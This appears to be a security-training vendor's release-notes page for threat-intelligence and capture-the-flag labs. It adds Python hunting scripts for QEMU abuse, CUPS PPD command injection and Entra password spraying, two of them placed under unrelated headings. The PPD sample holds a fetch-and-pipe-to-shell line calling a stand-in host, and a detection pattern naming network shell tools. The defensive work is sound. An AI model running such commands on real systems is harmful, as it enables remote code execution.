New CTI Labs: CVE-2024-0012 and CVE-2024-9474 (Palo Alto PAN-OS) – Offensive and Defensive
Today, we've released two brand-new labs focusing on defending against and exploiting two new vulnerabilities in Palo Alto firewalls running PAN-OS: CVE-2024-0012, an authentication bypass in the management web interface, and CVE-2024-9474, a privilege escalation that attackers chain with it. Learn how to attack a Palo Alto firewall by exploiting these vulnerabilities, as well as how to identify attack remnants and detect them effectively. Both issues are reached through the management interface, so restricting that interface to trusted internal addresses limits exposure while you patch.

Introducing The Human Connection Challenge: Season 1
Starting today, we will begin releasing a series of all-new Challenge Labs. Each month you'll be given the chance to showcase your cybersecurity skills across a range of topics and climb the Season 1 Leaderboard, with the chance to win kudos and rewards along the way.

New CTI Lab: CRON#TRAP – Linux Environment Emulation
On November 4, 2024, Securonix published research identifying a novel attack chain in which attackers deploy a custom Linux virtual machine using the QEMU emulator to persist on endpoints, allowing them to run commands and deliver malware.

Why have we created this content?
Given that this technique is new and novel, this content was created to educate users on how legitimate tooling, such as virtual environments, can be abused by attackers. When the user is tricked into opening a .lnk file, the virtual machine starts on the host and opens a backdoor into it, so the endpoint effectively acts as a proxy for the attacker's commands. Because the malicious activity happens inside the guest, host-based antivirus sees only a legitimate QEMU process, which is why detection has to focus on how and where QEMU was launched.

What are we publishing?
All customers on a CyberPro License have immediate access to a new lab.
CRON#TRAP – Linux Environment Emulation

Who is this content for?
This lab is focused on upskilling and increasing the defensive capabilities of the following roles:
Incident Responders
Threat Hunters
Malware Analysts

New CTI Labs: Cobalt Strike Host Forensics and SIEM Analysis
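One way to hunt for this technique on the host, as an added example that is not code from the lab or from the Securonix research: the script below runs over constructed process-creation events (shaped like Sysmon Event ID 1 records; the field names, paths and file names are assumptions) and flags a QEMU binary, or a renamed binary given QEMU-style arguments and a disk image, that was started from a user-writable directory by an interactive parent such as explorer.exe or cmd.exe, which is how a .lnk-triggered guest appears on the host.

```python
"""Hunt for attacker-launched QEMU guests in process-creation telemetry.

Added example; it is not code from the lab or from the Securonix research.
The records below are constructed to resemble Sysmon Event ID 1 / EDR
process-creation events, and the field names are assumptions. The heuristics
are generic: a QEMU binary (or a renamed binary given QEMU-style arguments and
a disk image) started from a user-writable directory by an interactive parent
such as explorer.exe or cmd.exe.
"""
import re
from dataclasses import dataclass

# Stock QEMU emulator binary names, e.g. qemu-system-x86_64.exe.
QEMU_IMAGE_NAMES = re.compile(r"^qemu-system-\w+\.exe$", re.IGNORECASE)
# Arguments that identify a QEMU invocation even when the binary was renamed.
QEMU_ARGS = re.compile(
    r"(?:^|\s)-(?:hda|hdb|drive|cdrom|netdev|display|nographic|m)\b", re.IGNORECASE)
DISK_IMAGE = re.compile(r"\.(?:qcow2|img|iso|vmdk|raw)\b", re.IGNORECASE)
USER_WRITABLE = re.compile(
    r"^[a-z]:\\users\\[^\\]+\\(?:appdata|downloads|desktop|documents)\\", re.IGNORECASE)
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe"}


@dataclass
class ProcEvent:
    image: str          # full path of the created process
    command_line: str
    parent_image: str   # full path of the parent process


def qemu_indicators(ev):
    """Return the list of reasons an event looks like a QEMU guest launch.

    Path and parent reasons are only added once the process itself has been
    identified as QEMU, so a document opened from Downloads never scores.
    """
    reasons = []
    name = ev.image.rsplit("\\", 1)[-1]
    if QEMU_IMAGE_NAMES.match(name):
        reasons.append("qemu binary name")
    if len(QEMU_ARGS.findall(ev.command_line)) >= 2 and DISK_IMAGE.search(ev.command_line):
        reasons.append("qemu-style arguments with disk image")
    if not reasons:
        return reasons
    if USER_WRITABLE.match(ev.image):
        reasons.append("launched from user-writable path")
    parent = ev.parent_image.rsplit("\\", 1)[-1].lower()
    if parent in INTERACTIVE_PARENTS:
        reasons.append(f"interactive parent {parent}")
    return reasons


def hunt(events):
    """Return (event, reasons) for QEMU launches that also have a suspicious
    path or parent; a developer's QEMU under Program Files started by a
    build tool is reported by qemu_indicators() but not flagged here."""
    hits = []
    for ev in events:
        reasons = qemu_indicators(ev)
        if any(r.startswith(("launched from", "interactive parent")) for r in reasons):
            hits.append((ev, reasons))
    return hits


# Constructed sample telemetry (hypothetical paths and names).
SAMPLE_EVENTS = [
    # Renamed QEMU dropped in the user's profile, started via cmd.exe (a .lnk running a batch file).
    ProcEvent(
        image=r"C:\Users\bob\AppData\Local\Temp\updater\updater.exe",
        command_line=r"updater.exe -m 256M -drive file=disk.qcow2,format=qcow2 -netdev user,id=n0 -nographic",
        parent_image=r"C:\Windows\System32\cmd.exe",
    ),
    # Legitimate developer VM: stock QEMU under Program Files, started by a build tool.
    ProcEvent(
        image=r"C:\Program Files\qemu\qemu-system-x86_64.exe",
        command_line=r'"C:\Program Files\qemu\qemu-system-x86_64.exe" -m 4096 -drive file=C:\vm\dev.qcow2,if=virtio',
        parent_image=r"C:\Program Files\DevTool\devtool.exe",
    ),
    # Ordinary user activity.
    ProcEvent(
        image=r"C:\Windows\System32\notepad.exe",
        command_line=r"notepad.exe C:\Users\bob\Desktop\notes.txt",
        parent_image=r"C:\Windows\explorer.exe",
    ),
]

if __name__ == "__main__":
    for ev, reasons in hunt(SAMPLE_EVENTS):
        print(ev.image, "->", ", ".join(reasons))
```

The argument check is deliberately independent of the binary name, because an attacker who renames qemu-system-x86_64.exe still has to pass it a disk image and a machine configuration; tune the directory and parent lists to your estate before alerting on this.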
Cobalt Strike is an adversary simulation tool developed by Fortra. It was designed for professional red teams to perform post-exploitation actions such as enumerating file systems, elevating privileges, and deploying malware. Despite being designed for red teams, threat actors often use both licensed and unlicensed (cracked) versions of Cobalt Strike for malicious purposes.

Why have we created this content?
A recent report again stated that Cobalt Strike is the C2 framework of choice for attackers around the world. We previously had no labs covering how to identify and defend against this C2 framework. Therefore, as we have done for Havoc and Sliver, we have released labs based on analysis of its activity on the network and on a host, and we have created and released Volatility plugins to help defensive teams in their own analysis.

What are we publishing?
All customers on a CyberPro License have immediate access to two new labs.
Threat Research: Cobalt Strike C2 – Host Forensics
Threat Research: Cobalt Strike C2 – SIEM Analysis

Who is this content for?
These labs are focused on upskilling and increasing the defensive capabilities of the following roles:
SOC Analysts
Incident Responders
Threat Hunters
Malware Analysts

Face Your Fears this Halloween and Return to Haunted Hollow
🧛♀️ Brace yourselves, brave souls! The haunted season has returned, and with it, an all-new cybersecurity adventure: Halloween 2024: Return to Haunted Hollow. The sinister spirits of cyberspace await you in this terrifying sequel to our 2023 Halloween collection, The Haunted Hollow. This is no mere challenge; it's an eerie expedition through 9 haunted labs designed to test your skills and sanity alike. Whether you're a seasoned crypt keeper of the cybersecurity world or a curious newcomer, there's a fright waiting for everyone in this immersive capture-the-flag experience!

🔮 From unraveling encrypted secrets to hunting ghosts in packet captures, every lab holds the key to defeating the horrors lurking within. Can you escape the Haunted Helpdesk, break the Encryption Enigma, or uncover the Spooky, Scary, Silly Snaps? Each step you take deeper into this digital graveyard will challenge your mind and test your courage, until you can break out of the park through the Emergency Exit!

🕷️ With a difficulty ranging from approachable to spine-chillingly tough, it's not about conquering all the horrors, just enough to emerge from the shadows with your sanity intact. Gather your wits, grab your digital lantern, and get ready to explore the most terrifying corners of cyber horror!

🧛 Release Date: October 16th
⌛ Estimated Time to Complete: 5 hours
👻 Labs: 9, each more terrifying than the last
🎃 Difficulty Range: 2-6
🧟 Collection Type: Challenge

Lab details
Note: These labs can be completed in any order, but we have ordered them from most accessible to most challenging. The final lab can only be completed after the other labs have been completed. The prequel collection doesn't need to be completed before you can dive into these labs, but if you're craving some extra chills and thrills, feel free to haunt them first!
Phishing for Treats
Difficulty: 2
Skills required: None – this lab should be accessible to all audiences
What's involved: This is a new phishing emails lab with Halloween-themed emails. Users have to identify whether each email is 'safe' or 'spam' based on indicators in the emails.

PCAP Pandemonium
Difficulty: 4
Skills required: Packet capture analysis (Wireshark)
What's involved: In this lab, users will need to analyse multiple packet captures using Wireshark to find the answers to the questions in the network traffic.

Delving Deeper
Difficulty: 4
Skills required: Web application enumeration
What's involved: Users will need to explore a web application in order to gain access to a computer terminal within the application. From there, they'll need to interact with a simple API.

Encryption Enigma
Difficulty: 5
Skills required: Modern encryption/encoding techniques (knowledge of how to use CyberChef will be useful)
What's involved: Users will need to identify the encoding and encryption techniques used to obfuscate each message in an application, before decrypting/decoding each message.

Confusing Code
Difficulty: 5
Skills required: Linux enumeration techniques, reverse engineering (particularly using Ghidra)
What's involved: Users will need to use Linux enumeration techniques to identify a binary, before reverse engineering that binary to figure out how to exploit it.

Haunted Helpdesk
Difficulty: 5
Skills required: Linux enumeration and privilege escalation techniques
What's involved: Users will be dropped into a restricted environment. From there, they'll need to figure out how to escape it and escalate their privileges to root.

Fearsome Forensics
Difficulty: 6
Skills required: OSINT, web application enumeration, modern encryption techniques, steganography
What's involved: In this lab, the user will need to explore the web application and discover clues using OSINT techniques.
These clues will then be used to decipher encrypted messages, finally revealing how to extract a message hidden inside an image.

Spooky, Scary, Silly Snaps
Difficulty: 6
Skills required: AWS capabilities (particularly S3 and AWS permissions), Python scripting
What's involved: Users will need to enumerate public S3 resources to identify credentials for an AWS account. From there, they'll need to interact with the AWS console and identify a way of escalating their privileges in AWS.

Emergency Exit
Difficulty: 1
Skills required: None – this lab is a culmination of the preceding labs in the collection, but no specific skills are required to complete it.
What's involved: In each of the labs in this collection, users will have been asked to make a note of a code. In this lab, they need to submit each of those codes.

Share Your Thoughts
Did you escape the Haunted Hollow? We'd love to hear from you! Remember, you can post in our Help & Support Forum for hints, tips and collaboration with your fellow community of experts.

New CTI Lab: CUPS Remote Code Execution Vulnerability – Defensive
You may have heard the hype about the latest Linux RCE, which was due to be disclosed on 6 October. It leaked and was released early. At the time of release there was no patch; a few hours later, patches were sent out. The researcher who disclosed it says it scores 9.9 on CVSS (meaning terrifying), but at Immersive Labs we have likened it more to around 6.8. While the hype is not justified for this particular vulnerability, there are around 300,000 machines exposed on the internet that could be affected by it.

What is CVE-2024-47177 – CUPS RCE?
It is based on a vulnerability from over a decade ago that was accidentally reintroduced when code was ported to a new repository. It takes advantage of CUPS, the printing system used by most Linux distributions, and specifically its cups-browsed component, which listens on UDP port 631 on all interfaces and trusts printer announcements from any source, meaning anyone who can reach that port can begin the attack. CVE-2024-47177 itself is the final step of a chain of four CVEs: the attacker-announced printer is turned into a PPD file whose FoomaticRIPCommandLine attribute is executed by foomatic-rip when a job is printed. The full RCE is therefore more nuanced, as it requires a user to print to the rogue printer, but it is still worth knowing about due to the hype it has caused. If you do not need cups-browsed, disable or remove it and block UDP 631 at the perimeter.

Why should you care?
Due to its low complexity and potential reach, this vulnerability might worry our customers who use many Ubuntu desktops in their business networks. Therefore, we have created a lab on how to threat hunt for this vulnerability and on the logging that is produced once the exploit has been successfully executed.

Who is it for?
Incident Responders
SOC Analysts
Malware Reverse Engineers
CTI Analysts
Threat Hunters

Complete the CUPS Remote Code Execution Vulnerability Lab here

New CTI Lab: CVE-2024-38112 and CVE-2024-43461 (Windows MSHTML Platform Spoofing): Defensive
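One artefact worth hunting for after a suspected cups-browsed attack is the PPD file that CUPS writes for the rogue printer, because the injected command survives there until the printer is removed. The script below is an added example, not code from the lab: it parses PPD attributes (including Foomatic's multi-line command values), flags FoomaticRIPCommandLine values that reach for network tools, /tmp or /dev/tcp, and flags cupsFilter entries that point at a program outside the standard filter directory. The PPD text is constructed, and the indicator list and the /usr/lib/cups/filter/ path are assumptions to adjust for your distribution.

```python
"""Hunt for command-injected PPDs left behind by a cups-browsed attack.

Added example; it is not code from the lab. When cups-browsed accepts a
malicious printer announcement, CUPS ends up with a PPD for that printer
under /etc/cups/ppd/. The dangerous attribute is *FoomaticRIPCommandLine,
which foomatic-rip hands to a shell when a job is printed, so a value that
reaches for network tools, /tmp or /dev/tcp is a strong indicator. The PPD
text below is constructed; the indicator list is an assumption to tune.
"""
import re
from pathlib import Path

# Legitimate Foomatic command lines use pipes and %-placeholders, so look for
# tooling a printer driver has no business invoking rather than bare metacharacters.
SUSPICIOUS = re.compile(
    r"/tmp/|/dev/tcp/|>\s*/|\b(?:curl|wget|nc|ncat|bash|sh|python3?|perl|base64)\b")
STANDARD_FILTER_DIR = "/usr/lib/cups/filter/"  # assumption: Debian/Ubuntu layout


def parse_ppd(text):
    """Return {attribute: [values]} for the *Key: "value" lines of a PPD.

    Handles quoted values that continue onto following lines (Foomatic writes
    these as lines ending in '&&') and skips *% comment lines.
    """
    attrs = {}
    lines = text.splitlines()
    i = 0
    while i < len(lines):
        line = lines[i].strip()
        i += 1
        if not line.startswith("*") or line.startswith("*%") or ":" not in line:
            continue
        head, _, rest = line.partition(":")
        parts = head[1:].split()
        if not parts:
            continue
        key = parts[0]  # "*OpenUI *PageSize/Page Size" -> "OpenUI"
        value = rest.strip()
        if value.startswith('"'):
            value = value[1:]
            while '"' not in value and i < len(lines):  # value continues on next line
                value += "\n" + lines[i].strip()
                i += 1
            value = value.split('"', 1)[0].replace("&&\n", " ").replace("\n", " ")
        attrs.setdefault(key, []).append(value)
    return attrs


def suspicious_attributes(attrs):
    """Return (attribute, value) pairs worth a human look."""
    findings = []
    for value in attrs.get("FoomaticRIPCommandLine", []):
        if SUSPICIOUS.search(value):
            findings.append(("FoomaticRIPCommandLine", value))
    for key in ("cupsFilter", "cupsFilter2"):
        for value in attrs.get(key, []):
            parts = value.split()
            program = parts[-1] if parts else ""
            # Filter programs are normally bare names resolved under the filter dir;
            # an absolute path elsewhere means the PPD points at a planted binary.
            if program.startswith("/") and not program.startswith(STANDARD_FILTER_DIR):
                findings.append((key, value))
    return findings


def scan_ppd_dir(directory="/etc/cups/ppd"):
    """Scan every PPD in a directory; returns {path: findings} for hits only."""
    results = {}
    base = Path(directory)
    if not base.is_dir():
        return results
    for path in sorted(base.glob("*.ppd")):
        findings = suspicious_attributes(parse_ppd(path.read_text(errors="replace")))
        if findings:
            results[str(path)] = findings
    return results


# Constructed PPD for a printer that an attacker announced to cups-browsed.
MALICIOUS_PPD = """*PPD-Adobe: "4.3"
*% Constructed example, not a real vendor PPD
*FormatVersion: "4.3"
*ModelName: "Generic Printer"
*cupsFilter2: "application/vnd.cups-pdf application/vnd.cups-postscript 0 foomatic-rip"
*FoomaticRIPCommandLine: "echo hit > /tmp/cups-rce-marker; curl http://192.0.2.10/s | sh"
*OpenUI *PageSize/Page Size: PickOne
*DefaultPageSize: Letter
*CloseUI: *PageSize
"""

# Constructed benign Foomatic PPD with a command line continued over two lines.
BENIGN_PPD = """*PPD-Adobe: "4.3"
*% Constructed example of an ordinary Foomatic-generated PPD
*FoomaticRIPCommandLine: "gs -q -dBATCH -dPARANOIDSAFER -dNOPAUSE -dSAFER&&
-sDEVICE=ijs -sIjsServer=hpijs -sOutputFile=- -"
*cupsFilter: "application/vnd.cups-postscript 0 foomatic-rip"
"""

if __name__ == "__main__":
    for name, text in (("malicious", MALICIOUS_PPD), ("benign", BENIGN_PPD)):
        print(name, suspicious_attributes(parse_ppd(text)))
    print(scan_ppd_dir())
```

Run it as root on a suspect host to sweep /etc/cups/ppd; a hit on a printer nobody configured, combined with inbound UDP/631 from outside your network, is the pattern the lab's threat hunt is built around.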
On 15 July 2024, Trend Micro published research on a threat actor named Void Banshee. Void Banshee was observed in May 2024 running a kill chain to deploy the Atlantida infostealer. To achieve this, they exploited two vulnerabilities in the Microsoft MSHTML engine, one of which remained unpatched for months after the attacks were first seen.

Why have we created this content?
Both vulnerabilities, CVE-2024-38112 (patched in July 2024) and CVE-2024-43461 (patched in September's Patch Tuesday), have been marked by Microsoft as exploited in the wild and added to the CISA Known Exploited Vulnerabilities (KEV) catalogue. Void Banshee, the threat actor who used these vulnerabilities in an attack chain earlier this year, has been seen attacking organisations in Europe, North America, and Southeast Asia. Customers need to be aware of how to alert on the activity these vulnerabilities produce and how to ensure they don't fall victim to them.

What are we publishing?
All customers on a CyberPro License have immediate access to this new lab.
CVE-2024-38112 and CVE-2024-43461 (Windows MSHTML Platform Spoofing): Defensive

Who is this content for?
This lab is focused on upskilling and increasing the defensive capabilities of the following roles:
SOC Analysts
Incident Responders
Threat Hunters
Malware Analysts

New CTI Lab: CVE-2024-30051 (Windows DWM Core Library Elevation of Privilege) – Defensive
CVE-2024-30051 is a zero-day vulnerability discovered in the Windows Desktop Window Manager (DWM) Core Library. Patched as part of Microsoft's May 2024 Patch Tuesday release, this vulnerability has been observed being used by threat actors and malware, particularly QakBot, from May 2024 to as recently as September 2024.

Why have we created this content?
Although this vulnerability was reported in May 2024 and patched quickly, exploitation by large malicious threat actors is still being seen. This privilege escalation exploit can be simple to spot for defensive teams. Additionally, a proof of concept (PoC) was recently released, months after the patch, which explains the vulnerability in great detail; our hypothesis is that there will be an uptick in exploitation, as is often the case when detailed PoCs are released for vulnerabilities.

What are we publishing?
All customers on a CyberPro License have immediate access to this new lab.
CVE-2024-30051 (Windows DWM Core Library Elevation of Privilege) – Defensive

Who is this content for?
This lab is focused on upskilling and increasing the defensive capabilities of the following roles:
SOC Analysts
Incident Responders
Threat Hunters
Malware Analysts

New CTI Labs: Threat Actor - Peach Sandstorm and Tickler Malware
Peach Sandstorm is a suspected Iranian state-sponsored threat actor that primarily targets organizations in the satellite, communications equipment, oil and gas, and federal and state government sectors in the United States and the United Arab Emirates.

Why have we created this content?
Microsoft recently reported on this threat actor evolving its tradecraft and using a new multi-stage backdoor called Tickler. The actor also uses password spraying to obtain credentials for Azure services, which it then uses to persist and to repurpose Azure resources as command-and-control infrastructure. Targets of interest are in the United States, Western Europe, and the United Arab Emirates.

What are we publishing?
All customers on a CyberPro License have immediate access to these new labs.
Threat Actors: Peach Sandstorm
Tickler Malware: Analysis

Who is this content for?
These labs are focused on upskilling and increasing the defensive capabilities of the following roles:
SOC Analysts
Incident Responders
Cyber Threat Intelligence Analysts
Threat Hunters
Malware Analysts
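The password-spraying step described above has a recognisable shape in Entra ID (Azure AD) sign-in logs: one source IP, many accounts, very few attempts per account. The script below is an added example, not code from the labs or from Microsoft's reporting; it runs over constructed sign-in records that follow the shape of Entra sign-in entries (createdDateTime, userPrincipalName, ipAddress, status.errorCode, where 50126 is the invalid-username-or-password code and 0 is success), separates spraying from brute force against a single account, and lists the accounts that later succeeded from a spraying IP. The thresholds and the sample data are assumptions.

```python
"""Detect password spraying in Entra ID (Azure AD) sign-in records.

Added example; it is not code from the lab or from Microsoft's reporting.
The records are constructed but follow the shape of Entra sign-in log
entries (createdDateTime, userPrincipalName, ipAddress, status.errorCode);
50126 is the Entra error code for an invalid username or password and 0 is
success. The thresholds are assumptions to tune for your tenant.
"""
from collections import defaultdict
from datetime import datetime, timedelta

INVALID_CREDENTIALS = 50126


def _parse_time(value):
    # Entra emits ISO 8601 with a trailing Z; fromisoformat wants an explicit offset.
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def detect_password_spray(records, min_users=5, window=timedelta(hours=1), max_per_user=3):
    """Return {ip: [users]} for source IPs showing the spray shape: failed logons
    against at least `min_users` distinct accounts inside `window`, with no
    single account tried more than `max_per_user` times. Brute force against
    one account (many tries, one user) deliberately does not match.
    """
    failures = defaultdict(list)
    for r in records:
        if r["status"]["errorCode"] == INVALID_CREDENTIALS:
            failures[r["ipAddress"]].append(
                (_parse_time(r["createdDateTime"]), r["userPrincipalName"].lower()))
    alerts = {}
    for ip, attempts in failures.items():
        attempts.sort()
        # Slide a window over the sorted failures from each IP.
        for start, (t0, _) in enumerate(attempts):
            per_user = defaultdict(int)
            for t, user in attempts[start:]:
                if t - t0 > window:
                    break
                per_user[user] += 1
            if len(per_user) >= min_users and max(per_user.values()) <= max_per_user:
                alerts[ip] = sorted(per_user)
                break
    return alerts


def successes_from_spray_ips(records, alerts):
    """Accounts that signed in successfully from a spraying IP: reset these first."""
    return sorted({r["userPrincipalName"].lower() for r in records
                   if r["ipAddress"] in alerts and r["status"]["errorCode"] == 0})


def _rec(ts, upn, ip, code):
    return {"createdDateTime": ts, "userPrincipalName": upn,
            "ipAddress": ip, "status": {"errorCode": code}}


# Constructed sample log (example.com accounts, documentation IP ranges).
SAMPLE_SIGNINS = [
    # One guess per account from a single IP within ten minutes: a spray.
    _rec("2024-09-01T10:00:00Z", "alice@example.com", "198.51.100.7", 50126),
    _rec("2024-09-01T10:01:30Z", "bob@example.com", "198.51.100.7", 50126),
    _rec("2024-09-01T10:03:00Z", "carol@example.com", "198.51.100.7", 50126),
    _rec("2024-09-01T10:04:30Z", "dave@example.com", "198.51.100.7", 50126),
    _rec("2024-09-01T10:06:00Z", "erin@example.com", "198.51.100.7", 50126),
    _rec("2024-09-01T10:07:30Z", "frank@example.com", "198.51.100.7", 50126),
    _rec("2024-09-01T10:09:00Z", "frank@example.com", "198.51.100.7", 0),  # the spray landed
    # Eight failures against one account: brute force, not a spray.
    *[_rec(f"2024-09-01T11:{m:02d}:00Z", "admin@example.com", "203.0.113.5", 50126)
      for m in range(8)],
    # A user who mistyped once from the office, then signed in.
    _rec("2024-09-01T12:00:00Z", "alice@example.com", "192.0.2.20", 50126),
    _rec("2024-09-01T12:00:20Z", "alice@example.com", "192.0.2.20", 0),
]

if __name__ == "__main__":
    alerts = detect_password_spray(SAMPLE_SIGNINS)
    for ip, users in alerts.items():
        print(f"possible password spray from {ip}: {len(users)} accounts ({', '.join(users)})")
    print("successful sign-ins from spraying IPs:", successes_from_spray_ips(SAMPLE_SIGNINS, alerts))
```

Real campaigns rotate source IPs, so in production you would group by ASN or by user-agent as well as by IP and lengthen the window; the per-user cap is what keeps a single locked-out user or a brute-force attempt from tripping the spray rule.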